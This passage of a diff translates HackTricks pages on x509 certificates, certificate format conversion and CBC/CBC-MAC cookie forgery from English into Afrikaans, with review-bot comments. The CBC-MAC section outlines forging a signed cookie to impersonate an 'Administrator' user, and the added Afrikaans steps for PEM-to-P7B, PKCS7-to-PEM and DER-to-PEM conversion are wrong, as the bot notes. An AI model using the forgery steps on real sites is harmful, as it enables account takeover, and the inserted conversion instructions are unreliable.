- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date.
|
||||
- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key.
|
||||
- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application.
|
||||
- **Weergawenommer** dui die weergawe van die x509-formaat aan.
|
||||
- **Serienommer** identifiseer die sertifikaat uniek binne 'n Sertifikaatowerheid (SO) se stelsel, hoofsaaklik vir herroepingstracking.
|
||||
- Die **Onderwerp**-veld verteenwoordig die eienaar van die sertifikaat, wat 'n masjien, 'n individu, of 'n organisasie kan wees. Dit sluit gedetailleerde identifikasie in soos:
|
||||
- **Gemeenskaplike Naam (CN)**: Domeine wat deur die sertifikaat gedek word.
|
||||
- **Land (C)**, **Ligging (L)**, **Staat of Provinsie (ST, S, of P)**, **Organisasie (O)**, en **Organisasie-eenheid (OU)** verskaf geografiese en organisatoriese besonderhede.
|
||||
- **Onderskeidende Naam (DN)** sluit die volledige onderwerpidentifikasie in.
|
||||
- **Uitreiker** besonderhede van wie die sertifikaat geverifieer en onderteken het, insluitend soortgelyke subvelde as die Onderwerp vir die SO.
|
||||
- **Geldigheidsperiode** word aangedui deur **Nie Voor** en **Nie Na** tydstempels, wat verseker dat die sertifikaat nie voor of na 'n sekere datum gebruik word nie.
|
||||
- Die **Openbare Sleutel**-afdeling, wat krities is vir die veiligheid van die sertifikaat, spesifiseer die algoritme, grootte, en ander tegniese besonderhede van die openbare sleutel.
|
||||
- **x509v3-uitbreidings** verbeter die funksionaliteit van die sertifikaat deur **Sleutelgebruik**, **Uitgebreide Sleutelgebruik**, **Alternatiewe Naam van Onderwerp**, en ander eienskappe te spesifiseer om die toepassing van die sertifikaat fynaf te stel.
|
||||
|
||||
#### **Key Usage and Extensions**
|
||||
|
||||
- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment.
|
||||
- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication.
|
||||
- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively.
|
||||
- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys.
|
||||
- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status.
|
||||
- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate.
|
||||
#### **Sleutelgebruik en Uitbreidings**
|
||||
|
||||
- **Sleutelgebruik** identifiseer kriptografiese toepassings van die openbare sleutel, soos digitale handtekening of sleutelversleuteling.
|
||||
- **Uitgebreide Sleutelgebruik** versmalle verder die gebruiksmoontlikhede van die sertifikaat, bv. vir TLS-bedienerverifikasie.
|
||||
- **Alternatiewe Naam van Onderwerp** en **Basiese Beperking** definieer addisionele gasheernaam wat deur die sertifikaat gedek word en of dit 'n SO- of eindentiteit-sertifikaat is, onderskeidelik.
|
||||
- Identifiseerders soos **Sleutelidentifiseerder van Onderwerp** en **Sleutelidentifiseerder van Gesag** verseker uniekheid en naspeurbaarheid van sleutels.
|
||||
- **Gesaginligtings Toegang** en **CRL Verspreidingspunte** verskaf paaie om die uitreikende SO te verifieer en die sertifikaat-herroepingsstatus te kontroleer.
|
||||
- **CT Voor-sertifikaat SCT's** bied deursigtigheidslêers, wat krities is vir openbare vertroue in die sertifikaat.
|
||||
```python
|
||||
# Example of accessing and using x509 certificate fields programmatically:
|
||||
from cryptography import x509
|
||||
|
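Review bot: terminology drifts inside this hunk and against the rest of the file. "Certificate Authority (CA)" is rendered as "Sertifikaatowerheid (SO)" here (L4994, L5009, L5057) but the untranslated abbreviation "CA's" is kept later in the same file (L5147, L5183); pick one and use it throughout. Likewise "transparency logs" becomes "deursigtigheidslêers" (files) at L5066 while the Certificate Logs section translates "logs" as "joernale" (L5175, L5183); "deursigtigheidsjoernale" keeps the two consistent. Also the Python comment at L5072, `# Example of accessing and using x509 certificate fields programmatically:`, is left in English while the surrounding prose is translated; decide whether code comments are in scope for this translation and apply that rule to every block in the file.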
@ -61,8 +60,8 @@ from cryptography.hazmat.backends import default_backend
|
|||
|
||||
# Load an x509 certificate (assuming cert.pem is a certificate file)
|
||||
with open("cert.pem", "rb") as file:
|
||||
cert_data = file.read()
|
||||
certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
|
||||
cert_data = file.read()
|
||||
certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
|
||||
|
||||
# Accessing fields
|
||||
serial_number = certificate.serial_number
|
||||
|
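Review bot: this hunk touches the eight lines around `with open("cert.pem", "rb") as file:` but the old and new text of `cert_data = file.read()` and `certificate = x509.load_pem_x509_certificate(cert_data, default_backend())` read identically, so the change must be whitespace only. If the translation step stripped the indentation of the `with` body, the snippet no longer parses as Python; please confirm the two body lines are still indented under the `with` statement (only `cert_data = file.read()` needs to be inside it, the load call can sit at the outer level).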
@ -75,139 +74,180 @@ print(f"Issuer: {issuer}")
|
|||
print(f"Subject: {subject}")
|
||||
print(f"Public Key: {public_key}")
|
||||
```
|
||||
### **Verskil tussen OCSP en CRL-verspreidingspunte**
|
||||
|
||||
### **Difference between OCSP and CRL Distribution Points**
|
||||
**OCSP** (**RFC 2560**) behels 'n kliënt en 'n responder wat saamwerk om te kontroleer of 'n digitale openbare sleutelsertifikaat herroep is, sonder om die volledige **CRL** af te laai. Hierdie metode is doeltreffender as die tradisionele **CRL**, wat 'n lys van herroepingsertifikaatserienommers verskaf, maar 'n potensieel groot lêer vereis om af te laai. CRL's kan tot 512 inskrywings insluit. Meer besonderhede is beskikbaar [hier](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
|
||||
|
||||
**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
|
||||
### **Wat is Sertifikaattransparansie**
|
||||
|
||||
### **What is Certificate Transparency**
|
||||
Sertifikaattransparansie help om sertifikaatverwante bedreigings te beveg deur te verseker dat die uitreiking en bestaan van SSL-sertifikate sigbaar is vir domeineienaars, CA's en gebruikers. Die doelstellings is as volg:
|
||||
|
||||
Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are:
|
||||
* Voorkoming dat CA's SSL-sertifikate vir 'n domein uitreik sonder die domeineienaar se kennis.
|
||||
* Daarstel van 'n oop ouditeringstelsel vir die opspoor van per abuis of booswillig uitgereikte sertifikate.
|
||||
* Beskerming van gebruikers teen valse sertifikate.
|
||||
|
||||
* Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge.
|
||||
* Establishing an open auditing system for tracking mistakenly or maliciously issued certificates.
|
||||
* Safeguarding users against fraudulent certificates.
|
||||
#### **Sertifikaatjoernale**
|
||||
|
||||
#### **Certificate Logs**
|
||||
Sertifikaatjoernale is openbaar ouditeerbare, net byvoegbare rekords van sertifikate wat deur netwerkdienste onderhou word. Hierdie joernale verskaf kriptografiese bewyse vir ouditeringsdoeleindes. Beide uitreikingsowerhede en die publiek kan sertifikate na hierdie joernale indien of dit ondersoek vir verifikasie. Alhoewel die presiese aantal joernaalbedieners nie vasstaan nie, word verwag dat dit wêreldwyd minder as 'n duisend sal wees. Hierdie bedieners kan onafhanklik deur CA's, ISP's of enige belanghebbende entiteit bestuur word.
|
||||
|
||||
Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity.
|
||||
#### **Ondersoek**
|
||||
|
||||
#### **Query**
|
||||
Om Sertifikaattransparansiejoernale vir enige domein te ondersoek, besoek [https://crt.sh/](https://crt.sh).
|
||||
|
||||
To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh).
|
||||
Verskillende formate bestaan vir die stoor van sertifikate, elk met sy eie gebruiksscenario's en verenigbaarheid. Hierdie opsomming dek die belangrikste formate en bied leiding oor die omskakeling tussen hulle.
|
||||
|
||||
Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them.
|
||||
## **Formate**
|
||||
|
||||
## **Formats**
|
||||
### **PEM-formaat**
|
||||
- Die mees algemeen gebruikte formaat vir sertifikate.
|
||||
- Vereis afsonderlike lêers vir sertifikate en privaatsleutels, gekodeer in Base64 ASCII.
|
||||
- Gewone uitbreidings: .cer, .crt, .pem, .key.
|
||||
- Primêr gebruik deur Apache en soortgelyke bedieners.
|
||||
|
||||
### **PEM Format**
|
||||
- Most widely used format for certificates.
|
||||
- Requires separate files for certificates and private keys, encoded in Base64 ASCII.
|
||||
- Common extensions: .cer, .crt, .pem, .key.
|
||||
- Primarily used by Apache and similar servers.
|
||||
### **DER-formaat**
|
||||
- 'n Binêre formaat van sertifikate.
|
||||
- Ontbreek die "BEGIN/END CERTIFICATE"-verklarings wat in PEM-lêers gevind word.
|
||||
- Gewone uitbreidings: .cer, .der.
|
||||
- Word dikwels gebruik met Java-platforms.
|
||||
|
||||
### **DER Format**
|
||||
- A binary format of certificates.
|
||||
- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files.
|
||||
- Common extensions: .cer, .der.
|
||||
- Often used with Java platforms.
|
||||
### **P7B/PKCS#7-formaat**
|
||||
- Gestoor in Base64 ASCII, met uitbreidings .p7b of .p7c.
|
||||
- Bevat slegs sertifikate en kettingsertifikate, sonder die privaatsleutel.
|
||||
- Ondersteun deur Microsoft Windows en Java Tomcat.
|
||||
|
||||
### **P7B/PKCS#7 Format**
|
||||
- Stored in Base64 ASCII, with extensions .p7b or .p7c.
|
||||
- Contains only certificates and chain certificates, excluding the private key.
|
||||
- Supported by Microsoft Windows and Java Tomcat.
|
||||
### **PFX/P12/PKCS#12-formaat**
|
||||
- 'n Binêre formaat wat bedienersertifikate, tussenliggende sertifikate en privaatsleutels in een lêer inkapsuleer.
|
||||
- Uitbreidings: .pfx, .p12.
|
||||
- Hoofsaaklik gebruik op Windows vir die invoer en uitvoer van sertifikate.
|
||||
|
||||
### **PFX/P12/PKCS#12 Format**
|
||||
- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file.
|
||||
- Extensions: .pfx, .p12.
|
||||
- Mainly used on Windows for certificate import and export.
|
||||
### **Omskakeling van Formate**
|
||||
|
||||
### **Converting Formats**
|
||||
|
||||
**PEM conversions** are essential for compatibility:
|
||||
|
||||
- **x509 to PEM**
|
||||
**PEM-omskakelings** is noodsaaklik vir verenigbaarheid:
|
||||
|
||||
- **x509 na PEM**
|
||||
```bash
|
||||
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
|
||||
```
|
||||
- **PEM na DER**
|
||||
|
||||
PEM (Privacy-Enhanced Mail) en DER (Distinguished Encoding Rules) is twee verskillende formaatstandaarde vir sertifikate. PEM is 'n Base64-gekodeerde formaat wat gewoonlik gebruik word vir die stoor en oordrag van sertifikate. DER is 'n binêre formaat wat gebruik word vir die verwerking van sertifikate deur programme.
|
||||
|
||||
- **PEM to DER**
|
||||
Om 'n PEM-sertifikaat na DER-formaat om te skakel, kan die volgende opdrag gebruik word:
|
||||
|
||||
```bash
|
||||
openssl x509 -in certificate.pem -outform der -out certificate.der
|
||||
```
|
||||
|
||||
Hierdie opdrag sal die PEM-sertifikaat wat in die `certificate.pem`-lêer gestoor is, omskakel na DER-formaat en dit in die `certificate.der`-lêer stoor.
|
||||
```bash
|
||||
openssl x509 -outform der -in certificatename.pem -out certificatename.der
|
||||
```
|
||||
- **DER na PEM**
|
||||
|
||||
Om 'n DER-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word:
|
||||
|
||||
- **DER to PEM**
|
||||
1. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat te ontleed en die openbare sleutel daaruit te verkry:
|
||||
|
||||
```plaintext
|
||||
openssl x509 -inform der -in certificate.der -pubkey -noout > public_key.pem
|
||||
```
|
||||
|
||||
2. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat na PEM-formaat om te skakel:
|
||||
|
||||
```plaintext
|
||||
openssl x509 -inform der -in certificate.der -out certificate.pem
|
||||
```
|
||||
|
||||
Die DER-sertifikaat sal nou suksesvol na PEM-formaat omgeskakel word.
|
||||
```bash
|
||||
openssl x509 -inform der -in certificatename.der -out certificatename.pem
|
||||
```
|
||||
- **PEM na P7B**
|
||||
|
||||
- **PEM to P7B**
|
||||
Om 'n PEM-sertifikaatlêer na 'n P7B-formaat om te skakel, kan die volgende stappe gevolg word:
|
||||
|
||||
1. Maak 'n nuwe tekslêer en kopieer die inhoud van die PEM-lêer daarin.
|
||||
2. Verander die lêernaam na 'n .p7b-lêeruitbreiding.
|
||||
3. Stoor die lêer en dit sal nou in die P7B-formaat wees.
|
||||
|
||||
Dit is belangrik om daarop te let dat die P7B-formaat 'n binêre formaat is en nie die sertifikaat se privaat sleutel bevat nie. Die P7B-lêer bevat slegs die sertifikaatketting.
|
||||
```bash
|
||||
openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
|
||||
```
|
||||
- **PKCS7 na PEM**
|
||||
|
||||
Om 'n PKCS7-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word:
|
||||
|
||||
- **PKCS7 to PEM**
|
||||
1. Skep 'n nuwe tekslêer en kopieer die inhoud van die PKCS7-sertifikaat daarin.
|
||||
2. Verwyder enige lynafbrekings of wit spasies in die tekslêer.
|
||||
3. Voeg die volgende lyn by die begin van die tekslêer: `-----BEGIN PKCS7-----`.
|
||||
4. Voeg die volgende lyn by die einde van die tekslêer: `-----END PKCS7-----`.
|
||||
5. Stoor die tekslêer met die `.pem`-lêeruitbreiding.
|
||||
|
||||
Die PKCS7-sertifikaat is nou suksesvol omgeskakel na PEM-formaat.
|
||||
```bash
|
||||
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem
|
||||
```
|
||||
**PFX-omskakelings** is noodsaaklik vir die bestuur van sertifikate op Windows:
|
||||
|
||||
|
||||
**PFX conversions** are crucial for managing certificates on Windows:
|
||||
|
||||
- **PFX to PEM**
|
||||
- **PFX na PEM**
|
||||
```bash
|
||||
openssl pkcs12 -in certificatename.pfx -out certificatename.pem
|
||||
```
|
||||
|
||||
|
||||
- **PFX to PKCS#8** involves two steps:
|
||||
1. Convert PFX to PEM
|
||||
|
||||
- **PFX na PKCS#8** behels twee stappe:
|
||||
1. Omskakel PFX na PEM
|
||||
```bash
|
||||
openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem
|
||||
```
|
||||
2. Omskep PEM na PKCS8
|
||||
|
||||
2. Convert PEM to PKCS8
|
||||
Om 'n PEM-sertifikaat na PKCS8-formaat om te skakel, kan jy die volgende stappe volg:
|
||||
|
||||
1. Installeer die OpenSSL-hulpmiddel as dit nog nie op jou stelsel geïnstalleer is nie.
|
||||
2. Open 'n opdragvenster en navigeer na die plek waar die PEM-sertifikaat geleë is.
|
||||
3. Voer die volgende opdrag in om die PEM-sertifikaat na PKCS8-formaat om te skakel:
|
||||
|
||||
```plaintext
|
||||
openssl pkcs8 -topk8 -inform PEM -outform DER -in private.pem -out private.pk8 -nocrypt
|
||||
```
|
||||
|
||||
Hier moet jy die korrekte naam van die PEM-sertifikaat vervang met die naam van jou eie sertifikaat.
|
||||
|
||||
4. Nadat die opdrag suksesvol uitgevoer is, sal jy 'n nuwe PKCS8-sertifikaat met die naam "private.pk8" hê.
|
||||
|
||||
Met hierdie stappe kan jy 'n PEM-sertifikaat na PKCS8-formaat omskep.
|
||||
```bash
|
||||
openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8
|
||||
```
|
||||
|
||||
|
||||
- **P7B to PFX** also requires two commands:
|
||||
1. Convert P7B to CER
|
||||
- **P7B na PFX** vereis ook twee opdragte:
|
||||
1. Omskakel P7B na CER
|
||||
```bash
|
||||
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
|
||||
```
|
||||
|
||||
2. Convert CER and Private Key to PFX
|
||||
2. Omskep CER en Privaatsleutel na PFX
|
||||
```bash
|
||||
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
|
||||
```
|
||||
|
||||
***
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
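Review bot: the translated side of this hunk inserts procedural text that is not in the English source and that is wrong or contradicts the commands right below it; it should be dropped so only the translated headings and the original `openssl` commands remain. Under "PEM na P7B" (L5480-L5496) the steps tell the reader to copy the PEM content into a new file and rename it to `.p7b`, which does not produce a PKCS#7 structure, and the added sentence calling P7B a binary format contradicts the format section earlier in the hunk (L5290, Base64 ASCII); the real conversion is the `openssl crl2pkcs7` line that follows. Under "PKCS7 na PEM" (L5513-L5538) the inserted steps (strip line breaks, add `-----BEGIN PKCS7-----`/`-----END PKCS7-----`, save as `.pem`) do not extract certificates from a PKCS#7 bundle; `openssl pkcs7 -print_certs` at L5544 is the actual conversion. Under "DER na PEM" the inserted step 1 (L5428-L5439), `openssl x509 -inform der -in certificate.der -pubkey -noout > public_key.pem`, writes only the public key and is not part of a DER-to-PEM conversion. Under "Omskep PEM na PKCS8" the inserted steps (L5612-L5649) use `-outform DER -out private.pk8`, producing DER, while the page's own command at L5655 writes PEM; the two disagree on what the reader ends up with. Separately, L5655 spells the binary as `openSSL` on both sides of the diff; on a case-sensitive system that command is not found, so a follow-up should change it to `openssl`. Minor: L5724 renders "easily build and automate workflows" as "maklik en outomatiese werksvloeie te bou"; "maklik werksvloeie te bou en te outomatiseer" keeps the meaning.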
@ -1,85 +1,81 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# CBC
|
||||
|
||||
If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.
|
||||
As die **koekie** **slegs** die **gebruikersnaam** is (of die eerste deel van die koekie is die gebruikersnaam) en jy wil die gebruikersnaam "**admin**" naboots. Dan kan jy die gebruikersnaam **"bdmin"** skep en die **eerste byte** van die koekie **brute force**.
|
||||
|
||||
# CBC-MAC
|
||||
|
||||
**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security.
|
||||
**Cipher block chaining message authentication code** (**CBC-MAC**) is 'n metode wat in kriptografie gebruik word. Dit werk deur 'n boodskap blok vir blok te versleutel, waar elke blok se versleuteling gekoppel is aan die een voor dit. Hierdie proses skep 'n **ketting van blokke**, wat verseker dat selfs 'n enkele bit van die oorspronklike boodskap 'n onvoorspelbare verandering in die laaste blok van versleutelde data sal veroorsaak. Om so 'n verandering te maak of ongedaan te maak, is die versleutelingssleutel nodig, wat sekuriteit verseker.
|
||||
|
||||
To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E:
|
||||
Om die CBC-MAC van 'n boodskap m te bereken, word m in CBC-modus met 'n nul-inisialisasievektor versleutel en die laaste blok behou. Die volgende figuur skets die berekening van die CBC-MAC van 'n boodskap wat uit blokke bestaan![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) deur 'n geheime sleutel k en 'n blokversleuteling E:
|
||||
|
||||
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
|
||||
# Vulnerability
|
||||
# Kwesbaarheid
|
||||
|
||||
With CBC-MAC usually the **IV used is 0**.\
|
||||
This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So:
|
||||
Met CBC-MAC word die **IV wat gebruik word, gewoonlik as 0** gestel.\
|
||||
Dit is 'n probleem omdat 2 bekende boodskappe (`m1` en `m2`) onafhanklik 2 handtekeninge (`s1` en `s2`) sal genereer. So:
|
||||
|
||||
* `E(m1 XOR 0) = s1`
|
||||
* `E(m2 XOR 0) = s2`
|
||||
|
||||
Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32):
|
||||
Dan sal 'n boodskap wat bestaan uit m1 en m2 gekombineer (m3) 2 handtekeninge genereer (s31 en s32):
|
||||
|
||||
* `E(m1 XOR 0) = s31 = s1`
|
||||
* `E(m2 XOR s1) = s32`
|
||||
|
||||
**Which is possible to calculate without knowing the key of the encryption.**
|
||||
**Dit is moontlik om dit te bereken sonder om die versleutelingssleutel te ken.**
|
||||
|
||||
Imagine you are encrypting the name **Administrator** in **8bytes** blocks:
|
||||
Stel jou voor jy versleutel die naam **Administrator** in blokke van **8 byte**:
|
||||
|
||||
* `Administ`
|
||||
* `rator\00\00\00`
|
||||
|
||||
You can create a username called **Administ** (m1) and retrieve the signature (s1).\
|
||||
Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\
|
||||
now, you can use s32 as the signature of the full name **Administrator**.
|
||||
Jy kan 'n gebruikersnaam skep met die naam **Administ** (m1) en die handtekening (s1) daarvan bekom.\
|
||||
Dan kan jy 'n gebruikersnaam skep met die resultaat van `rator\00\00\00 XOR s1`. Dit sal `E(m2 XOR s1 XOR 0)` genereer, wat s32 is.\
|
||||
Nou kan jy s32 gebruik as die handtekening van die volledige naam **Administrator**.
|
||||
|
||||
### Summary
|
||||
### Opsomming
|
||||
|
||||
1. Get the signature of username **Administ** (m1) which is s1
|
||||
2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.**
|
||||
3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**.
|
||||
1. Kry die handtekening van die gebruikersnaam **Administ** (m1), wat s1 is.
|
||||
2. Kry die handtekening van die gebruikersnaam **rator\x00\x00\x00 XOR s1 XOR 0**, wat s32 is.
|
||||
3. Stel die koekie in as s32 en dit sal 'n geldige koekie wees vir die gebruiker **Administrator**.
|
||||
|
||||
# Attack Controlling IV
|
||||
# Aanval deur IV te beheer
|
||||
|
||||
If you can control the used IV the attack could be very easy.\
|
||||
If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\
|
||||
Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
|
||||
As jy die gebruikte IV kan beheer, kan die aanval baie maklik wees.\
|
||||
As die koekies net die versleutelde gebruikersnaam is, kan jy die gebruiker "**administrator**" naboots deur die gebruiker "**Administrator**" te skep en sy koekie te kry.\
|
||||
Nou, as jy die IV kan beheer, kan jy die eerste byte van die IV verander sodat **IV\[0] XOR "A" == IV'\[0] XOR "a"** en die koekie vir die gebruiker **Administrator** hergenereer. Hierdie koekie sal geldig wees om die gebruiker **administrator** met die oorspronklike **IV** na te boots.
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
|
||||
Meer inligting in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
